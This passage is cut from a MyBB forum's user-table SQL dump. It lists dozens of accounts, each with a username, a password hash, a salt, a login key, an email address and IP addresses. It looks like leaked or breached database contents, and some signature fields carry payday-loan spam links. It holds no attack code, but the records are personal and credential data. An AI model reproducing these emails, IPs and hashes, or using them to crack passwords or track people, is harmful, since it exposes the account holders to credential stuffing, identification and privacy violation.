Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '34'); INSERT INTO mybb_users VALUES('101', 'KFallen', 'b661596736fed6083cba97d1638a1e5c', '9aMLrb9g', 'c7jH63yeig7tdgwc91cNUudJWRHUkLBfBfR8pYD8xRZHlocHTn', 'KFallen97@gmail.com', '12', '', '', '', '2', '', '0', '', '1345731070', '1346379487', '1346107597', '1345867324', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '66.87.4.108', '66.87.4.160', '1112999020', '1112999072', '', '6397', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('113', 'Richy882x', 'e91bf8a79ad37fa286a1eb3b87cd471c', '1yFgBkdD', 'a2b1a94x4iEY3K1qrQlVtg7QI17bnwlUXKgOlnXL1om3yfg8n1', 'southparkdude1234@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345831161', '1345831410', '1345831161', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '92.5.146.21', '92.5.146.21', '1543868949', '1543868949', '', '249', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('114', 'Cute', 'e72ee98c9955c9c76030c8602010c22a', 'vCla7GBo', 'Z3YLRDoBpPvxpz415aQbhBUsnQXsGHEuyLSJYwziKs3Sr7pWjq', 'bananabana22@gmail.com', '0', '', '', '', '2', '', '0', '', '1345833272', '1346109524', '1345833738', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '70.143.76.31', '70.143.76.31', '1183796255', '1183796255', '', '644', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('116', '@SSASIN', '7d8578dabf4b2f029b53c26a45353553', '6b5ahQuV', 'V3lmDgi48TIWnHOrqaTs2Izj5K6LnywnLIypJkV8QHUgw8uFxN', 'sakariya.a@msn.com', '5', '', '', '', '2', '', '0', '', '1345849083', '1346350994', '1346177110', '1346176198', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.148.241.66', '2.98.233.26', '1318383938', '40036634', '', '3011', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('117', 'Brak', '0132180fbbb2858a782247d2a7a6656a', 'vvDckCcm', 'fwdcVRIHO64s7SGpDw4OmLVksMERJdzCBXH3LmMbiXKgrv3I3Z', 'tylercarey.school@gmail.com', '0', '', '', '', '2', '', '0', '', '1345862758', '1345863427', '1345862758', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '67.191.251.20', '67.191.251.20', '1136655124', '1136655124', '', '669', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('119', 'Neal Caffrey', '9a059a03aa1b3b38a5f421be07729a4c', '4wjSSN9n', 'ndDpD6H7IKSaN4vU7kOFHE9cQNZ6u9Rp2cHOuVvTA8dc7P8NZ2', 'solvents@hotmail.com', '3', '', '', '', '2', '', '0', '', '1345873087', '1345900004', '1345873087', '1345899801', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '58.178.177.230', '216.38.2.194', '984789478', '-668597566', '', '632', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('120', 'n431n', '614653875ce6b1ea5e1a2a4f68d9db34', 'gUALeEuT', '2udmmSQySZISvUSwKsn7YbyGUeDMQYpoYDvxStXh6a93WcOQsP', 'kpracas@yahoo.com', '0', '', '', '', '2', '', '0', '', '1345875927', '1345888248', '1345884546', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '182.50.65.67', '182.50.64.67', '-1238220477', '-1238220733', '', '4184', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('121', 'n3m1s', '3e68df8ce472f46137ea07d0e37165b7', 'Ml4UZI9a', 'tiK1Aw7WjJdmpihoA6b8BbfcoURJbH1vcFtOAKH9VeV2A7QS4T', 'nem1s@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345905447', '1345905447', '1345905447', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '83.149.48.17', '', '1402286097', '0', 'english', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('122', 'oddtrey10', '5961ea16bfd1d9515260a987aa42f021', 'QpxtLr2u', 'EB9JwB6IAzx9e1SHZapaNn2P2yg6NxZAIc2LEnla9KXLY9W1Gh', 'Vincent.coakley7@gmail.com', '0', '', '', '', '2', '', '0', '', '1345906437', '1346190350', '1346020621', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '98.219.25.81', '69.15.13.113', '1658526033', '1158614385', '', '6341', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('123', 'GraveDigger', '634e1b1426b3d747448a8d5cae23dd1d', 'nhj31GN7', 'mg2282782uvulG1XM7wh1AiQfDJV89VYqOcTxGYfeWafFydiEt', 'gravedigger1454@yahoo.de', '0', '', '', '', '2', '', '0', '', '1345907236', '1345907481', '1345907236', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '87.151.195.77', '87.151.195.77', '1469563725', '1469563725', '', '245', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('126', 'simplerule50', '1ee46d86c64f78f73dc137883f57577a', '3FyH7ayl', 'drdGUBSPdXtkxS21bijUzFdny7utnPRsaXjXousLJxNd7A8tqy', 'simplerule50@yahoo.com', '0', '', '', '', '2', '', '0', '', '1345917400', '1345917400', '1345917400', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '23.19.62.111', '', '387137135', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('124', 'FeretikK', '863ce00f5c43c0da74a0b976604ceea6', '3prr2kIl', 'ZD4fw1OmRFVDCyEJVbFvj1WnDCOhmqg3rrTthxRHDOjy6HdLkY', 'audic@live.de', '0', '', '', '', '2', '', '0', '', '1345912406', '1345913832', '1345912406', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '134.3.161.123', '134.3.161.123', '-2046582405', '-2046582405', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('125', 'Jimmy', '5e561fbaad38e712f68141c802c4a438', 'joERm7wD', 'sLhpskhx4pn9Qe2DlYvmodS66O1HfrloqiqUvpyGOJ2VdGTlfp', 'xgamergta@gmail.com', '0', '', '', '', '2', '', '0', '', '1345915607', '1350223657', '1350221186', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '5.5', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '117.203.212.64', '42.106.175.146', '1976292416', '711634834', '', '796', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('127', 'Eucliwood', '62176920406e9722bdfe149d0100176a', 'xDmWU2e9', 'ykBBA3wnmTnutu3mSS5J7tUBIa9E5DIZvIY3rDaNKNuczKCiLc', 'havard.solgard@hotmail.com', '6', './uploads/avatars/avatar_127.jpg?dateline=1345918362', '106|150', 'upload', '2', '', '0', '', '1345917993', '1348071820', '1347311117', '1346013059', '', '0', '', '', '', '', 'all', '[color=#FF0000]No Adult Content allowed. -Staff[/color]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '67', '0', '0', '88.90.14.9', '83.109.119.246', '1482296841', '1399683062', '', '5961', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('128', 'Lydian', 'e0fc56b5308916894890222e41ad833b', 'iFWlzUR1', 'O1IY1xHPQjozeKM5dR2ZWIOq8UhrkOQ1vHIUcplgsEyQgEmvEV', 'rabbitfish94@gmail.com', '0', '', '', '', '2', '', '0', '', '1345918240', '1350160938', '1350159283', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '67', '0', '0', '213.49.119.132', '213.49.101.145', '-718178428', '-718183023', '', '793', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('129', 'Reliant', '6d39458d9f81fb4564acd416f55b97f2', 'znqCCJjf', '31xaJqREchlQp6knRBvaQi2yuBWWZQrDRxp5FRfYwvOIJORhCo', 'j.dm@aol.com', '0', '', '', '', '2', '', '0', '', '1345970266', '1345971568', '1345970266', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '55', '0', '0', '24.126.110.197', '24.126.110.197', '410939077', '410939077', '', '35', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('130', 'Control', '2af53e8c97f622180480aa1d743dc4a2', 'P15c2NSn', 'vsrjpTc4sfai6MEsRxobjasKGM87gx2rgl9lY4FuX3gpNU1Kfe', 'Jake-gagnier88@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345970370', '1345970370', '1345970370', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '55', '0', '0', '69.165.221.119', '', '1168498039', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('131', 'bramieboy100', 'bee0b91ea11a73ee26e79e22e7e1200e', 'Brh6qxhI', '9kZYeaqraWlwLl5UT9bzX7F5K7FaGNIICUdYUFHWPEhYOPHAle', 'bram.livie@live.nl', '0', '', '', '', '2', '', '0', '', '1345974742', '1345975455', '1345974742', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '217.123.173.181', '217.123.173.181', '-646206027', '-646206027', '', '713', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('132', 'Sdlive', '10a6d6af2788b640883d5eb2f8481bd5', 'SuytTuCt', 'YuULZk9rG52UJCMP7QakQtrJBrSaiQ87qPQHPiXhZeYxPFZq3B', 'JoeGrizzly86@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346036311', '1346620766', '1346552568', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.50.23.117', '24.50.23.117', '405935989', '405935989', '', '1154', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('133', 'fredxue', '62daa84941343006784b5a7494dae00e', 'lwLDf71O', 'NnjhcXQc23oCbwhFn81okg1Fn24KNq8QP4N1nJYnkUC1FEUpnF', 'fredxyt@gmail.com', '0', '', '', '', '2', '', '0', '', '1346040899', '1346040899', '1346040899', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '74.125.178.84', '', '1249751636', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('134', 'marketmessenger', 'eadb88275c078d4b5608c6ce9e8d5a75', 'zTHJRUGF', 'Xi2Jn5GSZrCr4EfrawzgqDu8bGQcwwnVmR1ac8yn6koEVEZ49e', 'marketmessenger@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346085676', '1346085676', '1346085676', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.254.206.179', '', '-1375809869', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('135', 'v1rus', 'f74fe0a84c2fa7c9e32159c7ac1537e1', 'zGDfsikR', 'E8JjSMYK3z926mLMej6TLirLLiJpX3IDCMF289zyaHVzmgYCDu', 'levisdani@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346112256', '1346112256', '1346112256', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.191.242.98', '', '700445282', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('138', 'Dreamer', '421ee02468280d2f16c23917e5e9be77', 'Steo3Hxo', 'KIsteiMlQeOogo3SoDlfhJxpXEqhPg1fiNrRfsYjDFRBwxg6Wg', 'tehmodder1@gmail.com', '2', '', '', '', '2', '', '0', '', '1346168589', '1346959057', '1346876030', '1346171506', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/KULDE.gif[/img][/align]\r\n[color=#FFD700][b][align=center]Need any FREE Help or advice? PM me![/align][/b][/color]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '71.207.111.91', '71.207.111.91', '1204776795', '1204776795', '', '5161', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('136', 'Check', 'a7703028f26c16f064dc2be00660c4f9', 'vyoGegp8', 'v2Bz42p2bVg6rOaWV1gKsgAiNUf25KEI4C89zylo7nHSCKruuI', 'check_validity@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346119444', '1347855440', '1346119444', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.191.242.98', '72.231.24.165', '700445282', '1223104677', '', '73', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('137', 'Nox', 'a1a9f3c1ac7c7658ac9eba95605c0c10', 'MZs1yK9J', 'jlQl6ZJTz9sBWzdDDzCUM4QlpIeqa6N7Duled2gMOioRpnlTvQ', 'noxzie@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346124687', '1346124971', '1346124687', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '142.161.233.109', '142.161.233.109', '-1901991571', '-1901991571', '', '284', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('139', 'Guzzie', 'f8049e16e4f6fba910f5ae271b4ce6c8', 'jDxrPG63', 'NTrfvsgTc3yuUn6UQWX8gdKMEOqTFa2B8YenWHh5xVuUcDvsZ5', 'danny.spaan@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346188577', '1346531651', '1346530512', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.132.198.229', '24.132.198.229', '411354853', '411354853', '', '417', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('141', 'Bane™', 'a14aa2f20e22de2d6328d218cf12b9bf', '7I3MPITs', 'llk2DHyTcR6mweioyP7lv6wVGLehuHspmMBVg3f5XETc87OdW4', 'dienhardgfx@gmail.com', '10', './uploads/avatars/avatar_141.png?dateline=1346197719', '120|150', 'upload', '2', '', '0', '', '1346191779', '1346702906', '1346625589', '1346618430', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '10', '72.134.24.117', '72.134.24.117', '1216747637', '1216747637', '', '5479', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('147', 'Tiq3reye', '576d6b55bf9bbc66cd8dd8f91081e968', 'D4g8Jvl6', 'ucFwCnFLUuHbeQVEasBoh7ZJyGPGujTyqhAAgnU4mnVgHy5crm', 'tiq3reye@gmail.com', '0', '', '', '', '2', '', '0', '', '1346266776', '1346266848', '1346266776', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '188.22.16.120', '188.22.16.120', '-1139404680', '-1139404680', '', '72', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('144', 'TheOne™', '339273f8b07bbb8daac6f149af39881f', 'IZZN44je', 'eVdJ4oL9k1kf4UhkJAntNkbdcyFNhVRbOjZJJa25weCRRR8dMw', 'keano4spurs@live.co.uk', '1', '', '', '', '2', '', '0', '', '1346253791', '1346267703', '1346262438', '1346254192', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '86.24.67.92', '86.24.143.245', '1444430684', '1444450293', '', '1143', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('148', 'ryoazuma', '17b9e0aeb96ae5d79fcc2703e3133e1b', 'oFVpJiNQ', '4VrfJ8N97Kid4Yv5dFZiMqfMrkBggkRciab6zXpjyem9Y99Osx', 'twitchpeep@gmail.com', '0', '', '', '', '2', '', '0', '', '1346306195', '1346306562', '1346306195', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '183.83.29.21', '183.83.29.21', '-1219289835', '-1219289835', '', '367', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('248', 'ArianaR1956', 'e25dbc9a906ab2a3498c50086c3e6d79', 'njYCYwRA', 'emupbwRE9vYBlXLLb5UKWr96GXsXdA3Uot5YT2cv7L6BNM9LzZ', 'Lillyjgb2581@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349759153', '1349854547', '1349759153', '0', 'http://www.extratasty.com/profile/59605/cameranleon1969', '0', '', '', '', '3-2-1956', 'all', '[url=http://ostatic.org/member/seanlamb1959]cash advance provider[/url] [url=http://www.irmavs.com/users/KeaneHorn1948]payday loans without a bank account[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.101.56', '-2122750949', '-2122750664', '', '9', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('246', 'The Anarchist', 'd79c651f9dcc00013135dd77a9f9a8e5', 'VYiIWNc3', 'JLX2Rg5SJ2NnemIZW44qtvEbpFzICOOgM9KQyMBdVkJAT2xmSO', 'troll@nomail.xl.cx', '9', '', '', '', '10', '', '0', '', '1349751769', '1351537415', '1351466025', '1349824722', '', '', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '108.171.103.234', '72.231.24.165', '1823172586', '1223104677', '', '13804', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('149', 'cycoshas', '4c4022288d0abf8e7ca3a906c9507c47', '1ubztUDb', 'xY8wJpG7mUYYSlCbanMAmZ1KnZ4oT74jMELxS7AUgWMLqnJpLr', 'germanshashank@gmail.com', '0', '', '', '', '2', '', '0', '', '1346318204', '1346318204', '1346318204', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '122.176.223.235', '', '2058412011', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('150', 'MinecraftGeek', '13565b85e4c1a39071279082b3b3e9ad', 'bdTLkx98', 'rDN8dlrJgeDd5NzYt29okGiQ18Ui2LcXRRh97LL8vJeQx8tVTF', 'liamsidney12@ymail.com', '9', '', '', '', '2', '', '0', '', '1346344506', '1352508525', '1352480058', '1352361170', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.161.179.151', '86.147.121.117', '1453437847', '1452505461', '', '10366', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('151', 'r3dd3v1l5', '59b96234607ffc84bc2ae890ac120459', 'lJyAZukd', 'ShhgZO4ymM1pv35Bil7OMZ1PUkyWPfuyRxPKB4WPGAUy125Uxi', 'redjzuzzj@gmail.com', '0', '', '', '', '2', '', '0', '', '1346345209', '1346346477', '1346345209', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '1', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '60.52.87.169', '60.52.87.169', '1010063273', '1010063273', '', '1268', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('153', 'lemans123', '8752c5671bf8cd6867c6685231e35bcf', '1qibuenB', '2pfR5wsIpyOIIqX2twEQ2FZFwazreMSVy8h3t8f8wv8w2M6RLk', 'stave_123@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346349286', '1346361446', '1346359499', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.245.52.108', '173.245.52.108', '-1376439188', '-1376439188', '', '1391', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('157', 'Kin', '244626c86c86eb80ae596e33067719b3', 'EHLqJ25X', 'K3eimLdUnghJu2AobOg7gPInBpSAzBNZPbg5Cnv92t9aKN8slr', 'Kin_Track@yahoo.com', '0', '', '', '', '14', '', '0', '', '1346374246', '1346374246', '1346374246', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '197.251.130.199', '', '-973372729', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('158', 'Breezy', '5775ceda6392361651972a27a22c69d3', 'qTwX3lvP', 'dAjGUC3YEbxy3fIG86BgjUudOkC8skcrz83VSy7rHKQvf29qrm', 'drebig32@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346376902', '1346719969', '1346473349', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '68.40.229.156', '68.40.229.156', '1143530908', '1143530908', '', '1762', '1', '0', '0', 